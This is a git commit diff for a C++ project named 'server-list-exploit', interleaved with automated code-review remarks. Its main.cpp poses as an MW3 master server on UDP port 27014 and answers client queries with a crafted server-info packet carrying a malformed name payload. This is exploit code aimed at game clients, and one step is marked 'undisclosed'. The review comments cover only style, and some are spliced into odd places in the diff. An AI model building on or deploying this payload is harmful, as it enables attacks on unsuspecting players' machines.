commit 532838ca8edee91974afa858ddc2de84b0f85573
Author: Diavolo
Date: Tue May 11 09:33:54 2021 +0200
Init
diff --git a/.gitignore b/.gitignore
new file mode 100644
index 0000000..d1c0f69
--- /dev/null
+++ b/.gitignore
@@ -0,0 +1,153 @@
+### Windows
+
+# Windows image file caches
+Thumbs.db
+ehthumbs.db
+
+# Folder config file
+Desktop.ini
+
+# Recycle Bin used on file shares
+$RECYCLE.BIN/
+
+# Windows Installer files
+*.cab
+*.msi
+*.msm
+*.msp
+
+# Shortcuts
+*.lnk
+
+### OSX
+
+.DS_Store
+.AppleDouble
+.LSOverride
+
+# Icon must end with two \r
+Icon
+
+# Thumbnails
+._*
+
+# Files that might appear on external disk
+.Spotlight-V100
+.Trashes
+
+# Directories potentially created on remote AFP share
+.AppleDB
+.AppleDesktop
+Network Trash Folder
+Temporary Items
+.apdisk
+
+### Visual Studio
+
+# User-specific files
+*.suo
+*.user
+*.userosscache
+*.sln.docstates
+
+# User-specific files (MonoDevelop/Xamarin Studio)
+*.userprefs
+
+# Build results
+build
+
+# Visual Studio 2015 cache/options directory
+.vs/
+
+#Visual Studio Code
+.vscode/
+
+# MSTest test Results
+[Tt]est[Rr]esult*/
+[Bb]uild[Ll]og.*
+
+*_i.c
+*_p.c
+*_i.h
+*.ilk
+*.meta
+*.obj
+*.pch
+*.pdb
+*.pgc
+*.pgd
+*.rsp
+*.sbr
+*.tlb
+*.tli
+*.tlh
+*.tmp
+*.tmp_proj
+*.log
+*.vspscc
+*.vssscc
+.builds
+*.pidb
+*.svclog
+*.scc
+
+# Visual C++ cache files
+ipch/
+*.aps
+*.ncb
+*.opendb
+*.opensdf
+*.sdf
+*.cachefile
+
+# Visual Studio profiler
+*.psess
+*.vsp
+*.vspx
+*.sap
+
+# TFS 2012 Local Workspace
+$tf/
+
+# Guidance Automation Toolkit
+*.gpState
+
+# Visual Studio cache files
+# files ending in .cache can be ignored
+*.[Cc]ache
+# but keep track of directories ending in .cache
+!*.[Cc]ache/
+
+# Others
+~$*
+*~
+*.dbmdl
+*.dbproj.schemaview
+*.pfx
+*.publishsettings
+
+# Backup & report files from converting an old project file
+# to a newer Visual Studio version. Backup files are not needed,
+# because we have git ;-)
+_UpgradeReport_Files/
+Backup*/
+UpgradeLog*.XML
+UpgradeLog*.htm
+
+# SQL Server files
+*.mdf
+*.ldf
+
+### IDA
+*.id0
+*.id1
+*.id2
+*.nam
+*.til
+
+### Custom user files
+# User scripts
+user*.bat
+
+# Premake binary
+#premake5.exe
\ No newline at end of file
diff --git a/generate.bat b/generate.bat
new file mode 100644
index 0000000..b9ffdf6
--- /dev/null
+++ b/generate.bat
@@ -0,0 +1,3 @@
+@echo off
+git submodule update --init --recursive
+tools\premake5 %* vs2019
\ No newline at end of file
diff --git a/premake5.lua b/premake5.lua
new file mode 100644
index 0000000..01b23e0
--- /dev/null
+++ b/premake5.lua
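Review bot: `tools\premake5 %* vs2019` runs a prebuilt executable that this same commit adds as a binary blob under tools/premake5.exe, and nothing in the repository records which premake release it is or what it should hash to, so every developer who runs the script executes an unverifiable binary; the matching `.gitignore` entry, `#premake5.exe`, is commented out, so the file stays tracked. Record the provenance next to the binary, for example a `tools/README` line or a remark at the top of the script such as `:: tools\premake5.exe = premake-core <RELEASE_VERSION>, sha256 <EXPECTED_SHA256>` (placeholders to be filled in from the release page), or replace the checked-in file with a fetch step that downloads the pinned release and compares its checksum before invoking it. The `git submodule update --init --recursive` line is fine as long as the submodule commits stay pinned.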
@@ -0,0 +1,108 @@
+dependencies = {
+ basePath = "./deps"
+}
+
+function dependencies.load()
+ dir = path.join(dependencies.basePath, "premake/*.lua")
+ deps = os.matchfiles(dir)
+
+ for i, dep in pairs(deps) do
+ dep = dep:gsub(".lua", "")
+ require(dep)
+ end
+end
+
+function dependencies.imports()
+ for i, proj in pairs(dependencies) do
+ if type(i) == 'number' then
+ proj.import()
+ end
+ end
+end
+
+function dependencies.projects()
+ for i, proj in pairs(dependencies) do
+ if type(i) == 'number' then
+ proj.project()
+ end
+ end
+end
+
+newoption {
+ trigger = "copy-to",
+ description = "Optional, copy the EXE to a custom folder after build, define the path here if wanted.",
+ value = "PATH"
+}
+
+newoption {
+ trigger = "dev-build",
+ description = "Enable development builds of the client."
+}
+
+dependencies.load()
+
+workspace "server-list-exploit"
+location "./build"
+objdir "%{wks.location}/obj"
+targetdir "%{wks.location}/bin/%{cfg.platform}/%{cfg.buildcfg}"
+
+configurations {"Debug", "Release"}
+
+architecture "x86"
+platforms "x86"
+
+systemversion "latest"
+symbols "On"
+staticruntime "On"
+editandcontinue "Off"
+warnings "Extra"
+characterset "ASCII"
+
+if _OPTIONS["dev-build"] then
+ defines {"DEV_BUILD"}
+end
+
+flags {"NoIncrementalLink", "NoMinimalRebuild", "MultiProcessorCompile", "No64BitChecks" }
+
+filter "action:vs*"
+buildoptions "/std:c++17"
+defines { "_WINDOWS", "WIN32" }
+
+filter "action:gmake*"
+cppdialect "C++17"
+buildoptions "-std=c++17"
+defines { "_LINUX" }
+
+configuration "Release"
+optimize "Size"
+-- buildoptions {"/GL"}
+-- linkoptions { "/IGNORE:4702", "/LTCG" }
+
+defines {"NDEBUG"}
+
+flags {"FatalCompileWarnings"}
+
+configuration "Debug"
+optimize "Debug"
+
+defines {"DEBUG", "_DEBUG"}
+
+configuration {}
+
+project "server-list-exploit"
+kind "ConsoleApp"
+language "C++"
+
+pchheader "stdinc.hpp"
+pchsource "src/stdinc.cpp"
+
+files {"./src/**.hpp", "./src/**.cpp"}
+
+includedirs {"./src", "%{prj.location}/src"}
+
+-- links {"kernel32", "user32", "Ws2_32"}
+
+dependencies.imports()
+
+group "Dependencies"
+dependencies.projects()
\ No newline at end of file
diff --git a/src/main.cpp b/src/main.cpp
new file mode 100644
index 0000000..eb11ba6
--- /dev/null
+++ b/src/main.cpp
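Review bot: `dependencies.load()` assigns `dir` and `deps` without `local`, so both leak into the global environment shared by every premake script loaded afterwards, and `dep:gsub(".lua", "")` treats its first argument as a Lua pattern, where `.` matches any character and the match is unanchored, so any character followed by `lua` anywhere in the path is rewritten, not only the extension. Declare them `local dir = path.join(dependencies.basePath, "premake/*.lua")` and `local deps = os.matchfiles(dir)`, and anchor the pattern with `dep = dep:gsub("%.lua$", "")`. `dependencies.imports()` and `dependencies.projects()` walk the same table and differ only in the method they call, which could be a single helper taking the method name, but that is cosmetic. All three function bodies lie fully inside the hunk.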
@@ -0,0 +1,94 @@
+#include "stdinc.hpp"
+#include "main.hpp"
+
+#define MW3_SERVER_4CC 0x504F4F4C
+#define BUF_SIZE 1024
+
+SOCKET sock;
+
+bool startUp()
+{
+ WSADATA wsa_data;
+ WSAStartup(MAKEWORD(2, 2), &wsa_data);
+
+ sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
+ if (INVALID_SOCKET == sock)
+ {
+ printf("Can't initialize socket\n");
+ return false;
+ }
+
+ sockaddr_in service;
+ service.sin_family = AF_INET;
+ service.sin_addr.s_addr = htonl(INADDR_ANY);
+
+// net_masterServerPort
+ service.sin_port = htons(27014);
+ int result = bind(sock, (SOCKADDR*)&service, sizeof(service));
+ if (SOCKET_ERROR == result)
+ {
+ printf("Can't bind socket\n");
+ closesocket(sock);
+ return false;
+ }
+
+
+ return true;
+}
+
+DWORD WINAPI recvTh(LPVOID)
+{
+ auto buf = std::make_unique(BUF_SIZE);
+
+ u_long iMode = 1;
+ ioctlsocket(sock, FIONBIO, &iMode);
+
+ sockaddr_in sender{};
+ int senderSize = sizeof(sender);
+ serverInfo_t info{};
+
+// undisclosed step
+ info.serverName_ptr = 0;
+ info.rawDataSize = INFO_MAX_DATA;
+ SecureZeroMemory(&info.rawData, info.rawDataSize);
+
+ while (1)
+ {
+ SecureZeroMemory(buf.get(), BUF_SIZE);
+ auto len = recvfrom(sock, buf.get(), BUF_SIZE, 0, (SOCKADDR*)&sender, &senderSize);
+
+ if (len == SOCKET_ERROR)
+ {
+ return -1;
+ }
+
+ if (len == sizeof(serverQuery_t))
+ {
+ auto* packet = (serverQuery_t*)buf.get();
+
+ if (packet->magic4CC == MW3_SERVER_4CC)
+ {
+ printf("Server is sending info to a client\n");
+ auto bad_string = "\x5e\x01\xCC\xCC\x0C" "depthprepass"s;
+// auto bad_string = "\x5e\x01\xCC\xCC\x0A" "shellshock"s;
+ std::memcpy(&info.rawData[info.serverName_ptr], bad_string.data(), bad_string.length() + 1);
+ sendto(sock, (char*)&info, sizeof(serverInfo_t), 0, (SOCKADDR*)&sender, senderSize);
+ }
+ }
+#ifdef _LINUX
+ sleep(1000);
+#else
+ Sleep(1);
+#endif
+ }
+}
+
+int main(int, char**)
+{
+ if (!startUp())
+ {
+ return 1;
+ }
+
+ WSACleanup();
+}
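Review bot: `startUp()` discards the return value of `WSAStartup(MAKEWORD(2, 2), &wsa_data)` on its second statement, so a failed Winsock initialisation is only reported indirectly as "Can't initialize socket", and on the bind-failure path the function closes the socket but nothing calls `WSACleanup()`, which `main` reaches only after success. Check the result where it happens, `if (WSAStartup(MAKEWORD(2, 2), &wsa_data) != 0) { printf("Can't initialize Winsock\n"); return false; }`, and pair every successful WSAStartup with a WSACleanup on the failure paths too. The rest is style: `MW3_SERVER_4CC`, `BUF_SIZE` and the literal `27014` (annotated only by the `// net_masterServerPort` comment) would read better as named `constexpr` constants, the `(SOCKADDR*)`, `(serverQuery_t*)` and `(char*)` casts should be `reinterpret_cast`, and `recvTh` returns `-1` from a function declared `DWORD`, which silently becomes 0xFFFFFFFF; an explicit unsigned status keeps the intent visible. The global `SOCKET sock` is touched from both `startUp()` and `recvTh` with no comment on which thread owns it, which deserves at least a one-line note at its declaration.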
diff --git a/src/main.hpp b/src/main.hpp
new file mode 100644
index 0000000..5d535a0
--- /dev/null
+++ b/src/main.hpp
@@ -0,0 +1,39 @@
+#pragma once
+
+#define INFO_MAX_DATA 2048
+
+#pragma pack(1)
+
+typedef struct
+{
+ uint32_t magic4CC;
+ uint32_t timeStamp;
+} serverQuery_t;
+
+typedef struct
+{
+ uint32_t magic4CC;
+ uint32_t timeStamp;
+ int32_t players;
+ int32_t maxPlayers;
+ bool bPasswordProtected;
+ uint32_t bDedicated;
+ int32_t serverVersion;
+ uint64_t SteamId;
+ uint32_t gameIP_int;
+ uint32_t gameIP_ext;
+ uint16_t gamePort;
+ uint16_t queryPort;
+ uint16_t netPort;
+ char secID[8];
+ char secKey[16];
+ uint16_t mapName_ptr;
+ uint16_t serverName_ptr;
+ uint16_t serverTags_ptr;
+ uint16_t serverInfos_ptr;
+ uint16_t rawDataSize;
+ char rawData[INFO_MAX_DATA];
+
+} serverInfo_t;
+
+#pragma pack()
\ No newline at end of file
diff --git a/src/stdinc.cpp b/src/stdinc.cpp
new file mode 100644
index 0000000..ea7961b
--- /dev/null
+++ b/src/stdinc.cpp
@@ -0,0 +1 @@
+#include "stdinc.hpp"
\ No newline at end of file
diff --git a/src/stdinc.hpp b/src/stdinc.hpp
new file mode 100644
index 0000000..8003163
--- /dev/null
+++ b/src/stdinc.hpp
@@ -0,0 +1,34 @@
+#ifdef _LINUX
+#pragma clang diagnostic push
+#pragma clang diagnostic ignored "-Wpragma-pack"
+#endif
+
+// defines
+#define WIN32_LEAN_AND_MEAN
+
+// windows headers
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#pragma comment (lib, "Ws2_32.lib")
+
+// std includes
+#include
+
+#ifdef _LINUX
+#include
+#endif
+
+using namespace std::literals;
+
+// c types
+
+#include
+
+#ifdef _LINUX
+#pragma clang diagnostic pop
+#endif
\ No newline at end of file
diff --git a/tools/premake5.exe b/tools/premake5.exe
new file mode 100644
index 0000000..0e4954f
Binary files /dev/null and b/tools/premake5.exe differ
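Review bot: `serverInfo_t` carries a `bool bPasswordProtected` inside the `#pragma pack(1)` region, and main.cpp sends it with `sizeof(serverInfo_t)` and gates input on `len == sizeof(serverQuery_t)`; the standard does not fix `sizeof(bool)`, so the on-wire width of that field depends on the toolchain, and nothing in the header pins either layout. Declare the field `uint8_t bPasswordProtected;` and add `static_assert(sizeof(serverQuery_t) == 8, "wire layout");` plus the corresponding assert for `serverInfo_t`, so a compiler or packing change fails the build instead of silently shifting every later field. `#pragma pack(1)` … `#pragma pack()` resets packing to the default rather than restoring whatever the including file had; `#pragma pack(push, 1)` / `#pragma pack(pop)` is the conventional form, and main.cpp includes this header right after stdinc.hpp, whose `#pragma clang diagnostic ignored "-Wpragma-pack"` appears to exist only to hide the warning the unbalanced form produces. The `_ptr` members are offsets into `rawData` rather than pointers (main.cpp indexes `rawData[info.serverName_ptr]`), which a one-line comment on `mapName_ptr` through `serverInfos_ptr` should say, together with the fact that `rawDataSize` is expected to be at most `INFO_MAX_DATA`.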
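Review bot: `using namespace std::literals;` sits at namespace scope in the precompiled header, so every translation unit that includes stdinc.hpp gets all of the standard literal operators unqualified whether it wants them or not; main.cpp only uses the string `s` suffix, and a `using namespace std::string_literals;` placed inside the function that needs it keeps the header free of using-directives. `#pragma comment (lib, "Ws2_32.lib")` is an MSVC-only linker directive; on the `action:gmake*` / `_LINUX` configuration it is, as far as I can tell, ignored, so the library dependency belongs in the premake link list rather than in a header. The seven `#include` lines here, the one under `#ifdef _LINUX`, and `std::make_unique(BUF_SIZE)` in main.cpp all appear without their angle-bracketed text, which looks like the page rendering dropped it rather than a defect in the commit; the `// windows headers`, `// std includes` and `// c types` comments could name what each group is for so the intent survives such loss.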